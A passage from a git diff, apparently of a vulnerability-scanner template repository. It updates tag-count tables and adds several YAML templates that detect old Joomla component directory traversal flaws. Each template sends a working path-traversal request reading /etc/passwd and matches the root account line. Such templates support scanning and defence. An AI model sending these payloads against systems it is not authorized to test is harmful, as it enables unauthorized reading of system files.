| | -| dbeaver | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| redmine | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| nifi | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| woocommerce | 1 | | | | | | | | | -| mrtg | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | -| phpwiki | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| asus | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| rocketchat | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| xampp | 1 | | | | | | | | | -| testrail | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| kindeditor | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| shiro | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| tor | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| minimouse | 1 | | | | | | | | | -| adb | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| phpfastcache | 1 | | | | | | | | | -| gsoap | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| couchbase | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| beanstalk | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| terraform | 1 | | | | | | | | | -| owasp | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| rockethchat | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | | fortinet | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| listserv | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| tjws | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| netmask | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| tcexam | 1 | | | | | | | | | -| websphere | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| luftguitar | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| elascticsearch | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| s3 | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| artica | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | | acontent | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| lotus | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| openemr | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| clickhouse | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| iceflow | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| gilacms | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| meraki | 1 | | | | | | | | | | craftcms | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| solarlog | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| shopizer | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| gstorage | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| cockpit | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| jaspersoft | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | | portainer | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| s3 | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| rocketchat | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| phpshowtime | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| rockethchat | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | | lighttpd | 1 | | | | | | | | | -| email | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 74222ce600..33ad69d44e 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 739 | pikpikcu | 273 | cves | 739 | info | 650 | http | 1991 | -| lfi | 266 | dhiyaneshdk | 268 | vulnerabilities | 307 | high | 560 | file | 46 | -| panel | 252 | daffainfo | 217 | exposed-panels | 250 | medium | 456 | network | 42 | -| xss | 248 | pdteam | 195 | technologies | 192 | critical | 276 | dns | 12 | -| wordpress | 235 | geeknik | 154 | exposures | 188 | low | 154 | | | +| cve | 804 | daffainfo | 280 | cves | 804 | info | 661 | http | 2068 | +| lfi | 325 | pikpikcu | 277 | vulnerabilities | 311 | high | 621 | file | 46 | +| xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 | +| panel | 252 | pdteam | 199 | technologies | 200 | critical | 275 | dns | 12 | +| wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | | | exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | -| rce | 200 | gy741 | 76 | takeovers | 64 | | | | | -| tech | 183 | pussycat0x | 69 | default-logins | 56 | | | | | -| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | | -| wp-plugin | 161 | madrobot | 61 | workflows | 37 | | | | | +| rce | 200 | gy741 | 77 | takeovers | 64 | | | | | +| tech | 191 | pussycat0x | 70 | default-logins | 56 | | | | | +| wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | | +| cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | | diff --git a/network/deprecated-sshv1-detection.yaml b/cves/2001/CVE-2001-1473.yaml similarity index 63% rename from network/deprecated-sshv1-detection.yaml rename to cves/2001/CVE-2001-1473.yaml index c8dbbcea18..476fa47cd5 100644 --- a/network/deprecated-sshv1-detection.yaml +++ b/cves/2001/CVE-2001-1473.yaml @@ -1,14 +1,19 @@ -id: deprecated-sshv1-detection +id: CVE-2001-1473 info: name: Deprecated SSHv1 Protocol Detection author: iamthefrogy - severity: medium - tags: network,ssh,openssh + severity: high + tags: network,ssh,openssh,cves,cves2001 description: SSHv1 is deprecated and has known cryptographic issues. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 + classification: + cvss-score: 7.4 + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N + cve-id: CVE-2001-1473 + cwe-id: CWE-310 network: - host: diff --git a/cves/2007/CVE-2007-4504.yaml b/cves/2007/CVE-2007-4504.yaml new file mode 100644 index 0000000000..f9e0afd43d --- /dev/null +++ b/cves/2007/CVE-2007-4504.yaml @@ -0,0 +1,27 @@ +id: CVE-2007-4504 + +info: + name: Joomla! Component RSfiles 1.0.2 - 'path' File Download + author: daffainfo + severity: high + description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action. + reference: + - https://www.exploit-db.com/exploits/4307 + - https://www.cvedetails.com/cve/CVE-2007-4504 + tags: cve,cve2007,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/cves/2008/CVE-2008-6080.yaml b/cves/2008/CVE-2008-6080.yaml new file mode 100644 index 0000000000..d326f80636 --- /dev/null +++ b/cves/2008/CVE-2008-6080.yaml @@ -0,0 +1,27 @@ +id: CVE-2008-6080 + +info: + name: Joomla! Component ionFiles 4.4.2 - File Disclosure + author: daffainfo + severity: high + description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/6809 + - https://www.cvedetails.com/cve/CVE-2008-6080 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/cves/2008/CVE-2008-6222.yaml b/cves/2008/CVE-2008-6222.yaml new file mode 100644 index 0000000000..6cb7474f10 --- /dev/null +++ b/cves/2008/CVE-2008-6222.yaml @@ -0,0 +1,27 @@ +id: CVE-2008-6222 + +info: + name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/6980 + - https://www.cvedetails.com/cve/CVE-2008-6222 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/cves/2009/CVE-2009-1496.yaml b/cves/2009/CVE-2009-1496.yaml new file mode 100644 index 0000000000..b915fc3ad0 --- /dev/null +++ b/cves/2009/CVE-2009-1496.yaml @@ -0,0 +1,27 @@ +id: CVE-2009-1496 + +info: + name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/8367 + - https://www.cvedetails.com/cve/CVE-2009-1496 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/cves/2009/CVE-2009-2015.yaml b/cves/2009/CVE-2009-2015.yaml new file mode 100644 index 0000000000..372820389d --- /dev/null +++ b/cves/2009/CVE-2009-2015.yaml @@ -0,0 +1,27 @@ +id: CVE-2009-2015 + +info: + name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/8898 + - https://www.cvedetails.com/cve/CVE-2009-2015 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/cves/2009/CVE-2009-2100.yaml b/cves/2009/CVE-2009-2100.yaml new file mode 100644 index 0000000000..db846d97e7 --- /dev/null +++ b/cves/2009/CVE-2009-2100.yaml @@ -0,0 +1,27 @@ +id: CVE-2009-2100 + +info: + name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/8946 + - https://www.cvedetails.com/cve/CVE-2009-2100 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2009/CVE-2009-3053.yaml b/cves/2009/CVE-2009-3053.yaml new file mode 100644 index 0000000000..3a0a3a1739 --- /dev/null +++ b/cves/2009/CVE-2009-3053.yaml @@ -0,0 +1,27 @@ +id: CVE-2009-3053 + +info: + name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php. + reference: + - https://www.exploit-db.com/exploits/9564 + - https://www.cvedetails.com/cve/CVE-2009-3053 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2009/CVE-2009-3318.yaml b/cves/2009/CVE-2009-3318.yaml new file mode 100644 index 0000000000..957a9932a2 --- /dev/null +++ b/cves/2009/CVE-2009-3318.yaml @@ -0,0 +1,27 @@ +id: CVE-2009-3318 + +info: + name: Joomla! Component com_album 1.14 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/9706 + - https://www.cvedetails.com/cve/CVE-2009-3318 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2009/CVE-2009-4202.yaml b/cves/2009/CVE-2009-4202.yaml new file mode 100644 index 0000000000..33b3f6694d --- /dev/null +++ b/cves/2009/CVE-2009-4202.yaml @@ -0,0 +1,27 @@ +id: CVE-2009-4202 + +info: + name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/8870 + - https://www.cvedetails.com/cve/CVE-2009-4202 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2009/CVE-2009-4679.yaml b/cves/2009/CVE-2009-4679.yaml new file mode 100644 index 0000000000..10596c502d --- /dev/null +++ b/cves/2009/CVE-2009-4679.yaml @@ -0,0 +1,27 @@ +id: CVE-2009-4679 + +info: + name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/33440 + - https://www.cvedetails.com/cve/CVE-2009-4679 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0157.yaml b/cves/2010/CVE-2010-0157.yaml new file mode 100644 index 0000000000..84ce7e02b3 --- /dev/null +++ b/cves/2010/CVE-2010-0157.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-0157 + +info: + name: Joomla! Component com_biblestudy - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in 